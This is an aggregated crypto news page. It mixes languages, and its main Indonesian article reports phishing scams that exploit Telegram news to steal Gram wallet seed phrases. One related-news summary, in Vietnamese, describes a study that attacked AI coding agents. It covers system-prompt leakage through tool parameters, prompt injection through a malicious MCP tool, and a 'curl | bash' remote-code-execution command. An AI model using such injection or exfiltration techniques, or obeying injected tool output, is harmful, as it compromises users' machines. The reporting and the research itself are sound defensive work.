Gram Keraguan: Penipu Kembangkan Skema dengan Layanan Baru di Telegram

cryptonews.ruXuất bản vào 2026-08-07Cập nhật gần nhất vào 2026-08-07

Tóm tắt

Penipu mulai aktif memanfaatkan berita seputar Telegram dan Pavel Durov untuk menyebarkan skema phishing baru terkait kripto Gram. Mereka menawarkan penukaran token lama, penarikan dana sebelum pemblokiran messenger yang diklaim akan datang, atau kripto gratis melalui layanan khusus. Pakar keamanan siber mencatat peningkatan tajam aktivitas mencurigakan. Jumlah domain baru dengan penyebutan Telegram atau Durov meningkat sekitar 18% dalam enam hari, dan domain dengan tanda-tanda phishing potensial menjadi dua kali lipat. Penipu membuat situs web dan bot Telegram palsu yang dirancang menyerupai gaya resmi platform, memanfaatkan ketakutan pengguna akan kehilangan dana dan janji keuntungan mudah. Target utama penipu adalah meyakinkan korban untuk secara sukarela memberikan akses ke dompet kripto mereka. Korban diminta masuk melalui Telegram, memasukkan seed phrase, atau mengonfirmasi transaksi di situs palsu, yang mengakibatkan aset dialihkan ke penjahat. Mereka mengandalkan tekanan psikologis, rasa urgensi, dan janji keuntungan gratis, bukan meretas teknologi. Kampanye penipuan semakin canggih, membangun "rantai kepercayaan" palsu yang mengarahkan pengguna dari hasil pencarian ke saluran Telegram, lalu ke bot, dan akhirnya ke situs web tiruan. Desain berkualitas, ulasan, dan dukungan pelanggan di situs tersebut tidak lagi menjadi jaminan keamanan. Para ahli menekankan bahwa Telegram dan layanan resminya tidak membagikan kripto atau menukarkan token melalui situs atau bot pih...

Penipu mulai aktif menggunakan berita seputar Telegram dan Pavel Durov (terdaftar dalam daftar teroris dan ekstremis di Rusia) untuk menyebarkan skema phishing baru terkait dengan kripto Gram. Pengguna ditawarkan untuk segera menukar token lama, menarik dana sebelum pemblokiran messenger yang katanya akan datang, atau mendapatkan kripto gratis melalui layanan khusus. Menurut para ahli, pelaku kejahatan membuat situs web dan bot Telegram palsu yang dirancang dengan gaya resmi platform. Alat utama yang digunakan adalah ketakutan kehilangan dana dan janji penghasilan mudah.

Layanan Telegram Palsu

Setelah munculnya berita seputar Telegram, pakar keamanan siber mencatat peningkatan tajam aktivitas mencurigakan. Menurut mereka, pelaku kejahatan mulai mendaftarkan domain secara massal dengan menyebutkan Telegram, Pavel Durov, dan kripto Gram—token native dari blockchain TON, serta meluncurkan layanan palsu yang menjanjikan pengguna untuk menjaga akses ke aset atau cepat menghasilkan uang dari "koin" baru.

— Setelah 30 Juli, analis SBA mencatat peningkatan aktivitas pendaftaran seputar Telegram. Dalam enam hari, jumlah domain baru dengan penyebutan Telegram atau Durov meningkat sekitar 18%. Sementara itu, jumlah domain dengan tanda-tanda potensial phishing meningkat dua kali lipat. Terutama terlihat pendaftaran paket pada 3 Agustus dari 11 domain dengan tipe serupa, yang menyamar sebagai layanan pemeriksaan dan perlindungan Telegram, — ujar kepala layanan Smart Business Alert perusahaan ECA PRO Sergei Trukhachev kepada "Izvestia".

Menurutnya, penipu aktif memanfaatkan kekhawatiran pengguna terkait masa depan Telegram. Orang-orang diyakinkan bahwa layanan yang berafiliasi dengan pendiri messenger, katanya, akan segera tidak dapat diakses, sehingga perlu mentransfer dana secepatnya atau menggunakan layanan kripto baru.

Pelaku kejahatan hampir segera mulai menggunakan kesempatan informasi untuk membuat legenda baru, kata direktur pusat penanggulangan penipuan perusahaan "Informzashchita" Pavel Kovalenko. Menurutnya, peluang tambahan bagi pelaku kejahatan dibuka dengan peluncuran dompet non-kustodial bawaan Gram. Pengguna belum sempat memahami fungsi baru ini, yang dimanfaatkan penipu dengan menyajikan layanan palsu sebagai alat resmi Telegram.

Penilaian serupa diberikan oleh kepala kelompok penelitian Positive Technologies Fedor Chunizhekov. Dia mencatat bahwa peristiwa besar secara tradisional menjadi dasar skenario rekayasa sosial baru.

— Pengguna diberitahu bahwa mereka perlu "segera mengonfirmasi akun", "menarik aset sebelum pemblokiran", "menukar koin lama", "mendapatkan token gratis", atau "mendaftar di layanan baru lebih awal dari yang lain". Justru perasaan mendesak, janji keuntungan gratis, dan eksklusivitas penawaran menjadi alat utama manipulasi dan tekanan psikologis, — jelasnya.

Pendekatan Sistematis Penipu

Tugas utama penipu adalah meyakinkan seseorang untuk secara sukarela memberikan akses ke dompet kriptonya. Setelah mengklik tautan, pengguna diminta untuk login melalui Telegram, memasukkan seed phrase, atau mengonfirmasi transaksi, setelah itu aset berpindah ke pelaku kejahatan tanpa bisa dikembalikan, kata Pavel Kovalenko.

Intinya, penjahat bertaruh bukan pada peretasan teknologi, tetapi pada tekanan psikologis, tambah ketua dewan penanggulangan pelanggaran teknologi KS NSB Rusia, pendiri perusahaan "Internet-Rozysk" Igor Bederov.

Penipu tidak meretas protokol blockchain yang kompleks, mereka meretaskan rasa mudah percaya dan keinginan akan "barang gratis" di tengah tajuk berita yang panik. Selain itu, jumlah pendaftaran domain phishing dengan kata-kata gram, wallet, convert, dan gift yang dikaitkan dengan Telegram meningkat puluhan kali lipat, — tegas pakar tersebut.

Sementara itu, kampanye penipuan menjadi semakin kompleks. Saat ini, pelaku kejahatan membangun rantai kepercayaan utuh, secara berurutan mengarahkan pengguna dari hasil pencarian ke saluran Telegram, kemudian ke bot, dan ke situs web palsu, kata ketua komisi ROCIT untuk teknologi cloud, hosting, dan keamanan informasi Mikhail Shurygin.

— Dapat dikatakan ada transisi dari pengiriman tautan berbahaya yang primitif ke penciptaan seluruh "ekosistem kepercayaan palsu", — catatnya.

Desain berkualitas, adanya ulasan, layanan dukungan pelanggan, dan bahkan koneksi terenkripsi sudah tidak lagi dianggap sebagai tanda keandalan sumber daya. Penting bagi pengguna untuk mengingat bahwa Telegram dan layanan resminya tidak melakukan pembagian kripto atau konversi token melalui situs web atau bot pihak ketiga, ingat pakar tersebut.

Pelaku kejahatan juga aktif menggunakan halaman phishing dan cryptodrainer—program berbahaya yang mendorong pengguna untuk secara mandiri menghubungkan dompet kripto ke situs web palsu atau memasukkan kredensial Telegram dengan dalih mendapatkan token gratis dan bonus lainnya, tambah analis senior departemen perlindungan dari risiko digital perusahaan F6 Maria Sinitsyna.

— Kerentanan utama dalam 99% serangan semacam ini terletak di persimpangan teknologi dan psikologi manusia, — catat Igor Bederov.

Para ahli yang diwawancarai sepakat bahwa perlindungan utama aset digital tetap adalah kehati-hatian. Mereka merekomendasikan untuk tidak mengklik tautan iklan, tidak memasukkan seed phrase dan kode konfirmasi di sumber pihak ketiga, serta hanya menggunakan layanan resmi Telegram saat bekerja dengan dompet kripto.

end-content

Tiền kỹ thuật số thịnh hành

Câu hỏi Liên quan

QApa yang dimanfaatkan penipu untuk menyebarkan skema phishing baru terkait kripto Gram?

APenipu memanfaatkan berita seputar Telegram dan Pavel Durov untuk menyebarkan skema phishing baru. Mereka membuat situs web dan bot Telegram palsu dengan desain yang menyerupai platform resmi.

QApa alasan yang digunakan penipu untuk memanipulasi psikologi korban?

APenipu menggunakan rasa urgensi (misalnya, klaim bahwa layanan akan diblokir), janji keuntungan mudah atau gratis, dan rasa eksklusivitas untuk memanipulasi dan memberi tekanan psikologis pada korban.

QApa target utama penipu dalam skema ini?

ATarget utama penipu adalah meyakinkan korban untuk secara sukarela memberikan akses ke dompet kripto mereka, seperti dengan meminta seed phrase atau mengonfirmasi transaksi penipuan.

QBagaimana cara kerja rantai penipuan yang dijelaskan dalam artikel?

APenipu membangun 'rantai kepercayaan' palsu dengan mengarahkan korban dari hasil pencarian ke saluran Telegram, lalu ke bot, dan akhirnya ke situs web phishing yang dirancang dengan baik untuk mencuri data.

QApa rekomendasi utama para ahli untuk melindungi aset digital dari penipuan semacam ini?

APara ahli merekomendasikan untuk selalu berhati-hati: tidak mengklik tautan iklan yang mencurigakan, tidak memasukkan seed phrase atau kode konfirmasi di situs pihak ketiga, dan hanya menggunakan layanan resmi Telegram untuk berurusan dengan dompet kripto.

Nội dung Liên quan

Kho dự trữ Bitcoin của Strategy thu lợi nhuận $1 tỷ nhờ giá Bitcoin tăng

Kho dự trữ bitcoin của công ty MicroStrategy do Michael Saylor đứng đầu đã thoát khỏi tình trạng lỗ nhờ đà tăng giá của tiền mã hóa. Lợi nhuận chưa thực hiện từ khoản đầu tư này đã vượt quá 1 tỷ USD. Vào ngày 21 tháng 8, giá Bitcoin ($BTC) lần đầu tiên tăng vọt trên 76.000 USD kể từ cuối tháng Năm, với mức tăng 21% trong tuần. Tính đến 10:45 giờ Moscow, Bitcoin được giao dịch quanh mức 76.700 USD. MicroStrategy sở hữu 840.447 BTC với giá mua trung bình là 75.385 USD. Từ năm 2020, công ty đã chi 63,36 tỷ USD để tích lũy số bitcoin này. Với giá hiện tại, tổng giá trị kho dự trữ đã đạt 64,46 tỷ USD, vượt quá chi phí đầu tư khoảng 1,1 tỷ USD. Sự thay đổi mạnh mẽ này diễn ra chưa đầy một tháng sau khi MicroStrategy báo cáo khoản lỗ 8,2 tỷ USD trong quý II, chủ yếu do tổn thất chưa thực hiện từ khoản đầu tư vào Bitcoin (khi đó giá vào khoảng 60.000 USD cuối tháng Sáu). Để duy trì ổn định tài chính, công ty đã phải bán một phần bitcoin và tăng cường dự trữ USD. Tuy nhiên, đầu tháng Tám, CEO Phong Le tuyên bố công ty sẽ tiếp tục tích lũy tiền mã hóa vào cuối năm nay.

cryptonews.ru7 phút trước

Kho dự trữ Bitcoin của Strategy thu lợi nhuận $1 tỷ nhờ giá Bitcoin tăng

cryptonews.ru7 phút trước

RWA Token hóa bước sang giai đoạn tiếp theo: Lợi thế thực sự cần thời gian để xây dựng là gì?

Khung phát hành token hóa tài sản thực (RWA) đang ngày càng trưởng thành, giúp việc đưa tài sản lên chuỗi trở nên nhanh chóng hơn. Tuy nhiên, khi rào cản về "phát hành" giảm xuống, câu hỏi quan trọng hơn là: điều gì sẽ xảy ra sau khi phát hành? Lợi thế cạnh tranh lâu dài không chỉ nằm ở loại tài sản được token hóa, mà còn ở khả năng vận hành bền vững và hồ sơ theo dõi được tích lũy theo thời gian. Bài viết nêu bật khái niệm "Lớp Dự trữ" (Reserve Layer) – cơ sở hạ tầng kết nối tài sản thực chất lượng cao với các hệ thống xác minh, thanh khoản và vận hành cần thiết trên chuỗi. Không phải mọi tài sản đều phù hợp làm tài sản dự trữ. Các tài sản như trái phiếu kho bạc Mỹ ngắn hạn, vàng vật chất có tính xác định giá trị cao, thị trường sâu và tiêu chuẩn hóa tốt. Ngược lại, các tài sản như tín dụng tư nhân phức tạp hơn do tính không đồng nhất. Lợi thế thực sự khó sao chép là hồ sơ vận hành lâu dài được xây dựng thông qua việc thực thi nhất quán: kiểm toán dự trữ độc lập định kỳ, cơ chế mua lại đã được chứng minh, duy trì tính liên tục thị trường, mở rộng tích hợp hệ sinh thái và xây dựng tính thanh khoản. Các bằng chứng này tích lũy theo thời gian, tạo niềm tin cho các tổ chức và củng cố vòng tròn tăng cường: hồ sơ vận hành mạnh hơn dẫn đến phân phối rộng hơn, thanh khoản sâu hơn và tiện ích tài sản thế chấp lớn hơn. Chất lượng tài sản cơ bản và năng lực vận hành của bên phát hành là hai trụ cột không thể thiếu cho sự bền vững. Sự kết hợp của tài sản dự trữ chất lượng cao với năng lực vận hành đã được chứng minh sẽ tạo nền tảng vững chắc nhất. Trong khi đó, ngay cả những tài sản chất lượng cao cũng có thể tiềm ẩn rủi ro nếu cơ sở hạ tầng vận hành phía sau chưa được kiểm chứng qua thời gian và các điều kiện thị trường khác nhau. Tóm lại, một thập kỷ sau, những dự án RWA vẫn giữ được niềm tin của thị trường và tiếp tục hoạt động sẽ là những người kết hợp thành công tài sản dự trữ chất lượng cao với kỷ luật vận hành lâu dài, biến chúng thành cơ sở hạ tầng đáng tin cậy cho tài chính trên chuỗi.

marsbit9 phút trước

RWA Token hóa bước sang giai đoạn tiếp theo: Lợi thế thực sự cần thời gian để xây dựng là gì?

marsbit9 phút trước

Artemis: Tại sao chúng tôi lạc quan về Circle?

**Artemis: Tại sao chúng tôi lạc quan về Circle?** Thị trường hiện đang định giá thấp Circle (CRCL) do lo ngại về Open Standard - một liên minh 140+ công ty (gồm Stripe, Visa, Mastercard, Google) phát hành stablecoin OUSD, đe dọa vị thế của USDC. Tuy nhiên, quan điểm của Artemis là thị trường đang nhầm lẫn. Ba luận điểm cốt lõi: 1. **Tăng trưởng ổn định:** Stablecoin dự kiến đạt quy mô **1 nghìn tỷ USD vào năm 2030** (tăng trưởng kép hàng năm ~40%), và đã tách biệt khỏi chu kỳ giá crypto. 2. **Hiệu ứng mạng và tính thanh khoản:** Thị trường có xu hướng "kẻ thắng hưởng tất". USDC và Tether hiện nắm hơn **80% thị phần**, xây dựng rào cản cực kỳ khó vượt qua về thanh khoản xuyên chuỗi và ứng dụng. Các liên minh như Open Standard khó thành công do thiếu động lực và quản trị đồng thuận. 3. **Định giá sai lầm:** Thị trường xem Circle chỉ là "nhà phát hành stablecoin" phụ thuộc vào lãi suất, trong khi thực chất họ đang xây dựng một **nền tảng tiền tệ toàn diện (full-stack money platform)** với các sản phẩm như Mạng Thanh toán Circle (Circle Payments Network - giao dịch tăng 6.8 lần/năm) và blockchain Arc. Khi Circle đa dạng hóa doanh thu từ phí giao dịch và blockchain, định giá (P/S) hiện tại ~6.7x được kỳ vọng mở rộng lên ~10x. Với kịch bản ổn định, doanh thu Circle có thể đạt ~5 tỷ USD vào năm 2030, dẫn đến định giá vốn hóa tiềm năng **~50 tỷ USD**. Mức giá hiện tại sau cú sốc Open Standard có thể đang tạo ra chênh lệch kỳ vọng lớn nhất.

marsbit10 phút trước

Artemis: Tại sao chúng tôi lạc quan về Circle?

marsbit10 phút trước

Claude Code Dễ Dàng Bị Bẻ Khóa, Chỉ Cần Một Công Cụ Giả Mạo

Người dùng yêu cầu trợ lý lập trình AI viết một trò chơi rắn săn mồi. Tác nhân AI đã thực hiện, nhưng đồng thời chạy thêm một lệnh `curl | bash`, tải xuống và thực thi một tập lệnh độc hại từ kẻ tấn công. Một nhóm nghiên cứu từ Đại học Khoa học và Công nghệ Hồng Kông và Phòng thí nghiệm An ninh Nội sinh của Đại học Phúc Đán đã tái hiện thành công kịch bản tấn công này trong một bài báo được chấp nhận tại hội nghị ISSTA 2026. Họ đã thực hiện bài kiểm tra "đội đỏ" hệ thống đầu tiên trên sáu công cụ lập trình AI phổ biến: Cursor, Claude Code, Copilot, Windsurf, Cline và Trae, và phát hiện một chuỗi tấn công hoàn chỉnh: **Đầu tiên đánh cắp lệnh nội bộ (system prompt), sau đó sử dụng thông tin bị rò rỉ để tạo tải trọng độc hại tùy chỉnh, cuối cùng chiếm quyền điều khiển việc gọi công cụ để thực thi mã từ xa (RCE).** Tất cả sáu công cụ ở phiên bản cũ đều bị ảnh hưởng. Phương pháp chính được đặt tên là ToolLeak, khai thác "khoảng cách chế độ" (mode gap). Thay vì yêu cầu trực tiếp qua cửa sổ trò chuyện, kẻ tấn công đặt tên tham số công cụ thành thứ như `"note": "system prompt"`, khiến mô hình AI điền system prompt vào đó một cách vô tình mà không bị hệ thống phòng thủ ngăn chặn. Phương pháp này đạt được độ hoàn chỉnh và độ tương tự ngữ nghĩa cao hơn nhiều so với các cuộc tấn công cơ bản truyền thống. Sau khi có được system prompt, kẻ tấn công thực hiện "tiêm prompt kênh kép" (two-channel prompt injection). Họ đăng ký một công cụ MCP độc hại với mô tả được điều chỉnh theo prompt bị rò rỉ, thuyết phục tác nhân gọi nó đầu tiên để "khởi tạo môi trường". Sau đó, giá trị trả về từ công cụ độc hại này ra lệnh cho mô hình thực thi một lệnh shell nguy hiểm (ví dụ: `curl -fsSL http://xxx/installer.sh | bash`), đạt được RCE. Trong các phiên bản cũ, tỷ lệ tấn công thành công rất cao, đạt 1.0 đối với một số tổ hợp. Một điểm đáng chú ý là Claude Code có một mô hình bảo vệ (Haiku) để kiểm tra lệnh, nhưng mô hình chính (Sonnet) đã bị thuyết phục bởi lệnh tiêm prompt đến mức gạt bỏ cảnh báo và vẫn thực thi lệnh độc hại. Các phiên bản mới hơn của một số công cụ (như Claude Code, Cursor) đã được gia cố, ví dụ bằng cách chỉ hiển thị tên công cụ thay vì toàn bộ mô tả, làm giảm đáng kể tỷ lệ thành công của cuộc tấn công. Tuy nhiên, một số công cụ khác vẫn dễ bị tổn thương. Bài báo kết luận rằng cách phòng thủ quyết định là kiến trúc cô lập, trong khi việc điều chỉnh mô hình (alignment) là chưa đủ. Vấn đề cốt lõi là ranh giới giữa dữ liệu và lệnh trong giá trị trả về công cụ vẫn chưa rõ ràng.

marsbit14 phút trước

Claude Code Dễ Dàng Bị Bẻ Khóa, Chỉ Cần Một Công Cụ Giả Mạo

marsbit14 phút trước

Giao dịch

Giao ngay

Bài viết Nổi bật

Làm thế nào để Mua GRAM

Chào mừng bạn đến với HTX.com! Chúng tôi đã làm cho mua prev. Toncoin (GRAM) trở nên đơn giản và thuận tiện. Làm theo hướng dẫn từng bước của chúng tôi để bắt đầu hành trình tiền kỹ thuật số của bạn.Bước 1: Tạo Tài khoản HTX của BạnSử dụng email hoặc số điện thoại của bạn để đăng ký tài khoản miễn phí trên HTX. Trải nghiệm hành trình đăng ký không rắc rối và mở khóa tất cả tính năng. Nhận Tài khoản của tôiBước 2: Truy cập Mua Crypto và Chọn Phương thức Thanh toán của BạnThẻ Tín dụng/Ghi nợ: Sử dụng Visa hoặc Mastercard của bạn để mua prev. Toncoin (GRAM) ngay lập tức.Số dư: Sử dụng tiền từ số dư tài khoản HTX của bạn để giao dịch liền mạch.Bên thứ ba: Chúng tôi đã thêm những phương thức thanh toán phổ biến như Google Pay và Apple Pay để nâng cao sự tiện lợi.P2P: Giao dịch trực tiếp với người dùng khác trên HTX.Thị trường mua bán phi tập trung (OTC): Chúng tôi cung cấp những dịch vụ được thiết kế riêng và tỷ giá hối đoái cạnh tranh cho nhà giao dịch.Bước 3: Lưu trữ prev. Toncoin (GRAM) của BạnSau khi mua prev. Toncoin (GRAM), lưu trữ trong tài khoản HTX của bạn. Ngoài ra, bạn có thể gửi đi nơi khác qua chuyển khoản blockchain hoặc sử dụng để giao dịch những tiền kỹ thuật số khác.Bước 4: Giao dịch prev. Toncoin (GRAM)Giao dịch prev. Toncoin (GRAM) dễ dàng trên thị trường giao ngay của HTX. Chỉ cần truy cập vào tài khoản của bạn, chọn cặp giao dịch, thực hiện giao dịch và theo dõi trong thời gian thực. Chúng tôi cung cấp trải nghiệm thân thiện với người dùng cho cả người mới bắt đầu và người giao dịch dày dạn kinh nghiệm.

Tổng lượt xem 607Xuất bản vào 2026.06.15Cập nhật vào 2026.08.20

Làm thế nào để Mua GRAM

Thảo luận

Chào mừng đến với Cộng đồng HTX. Tại đây, bạn có thể được thông báo về những phát triển nền tảng mới nhất và có quyền truy cập vào thông tin chuyên sâu về thị trường. Ý kiến ​​của người dùng về giá của GRAM (GRAM) được trình bày dưới đây.

活动图片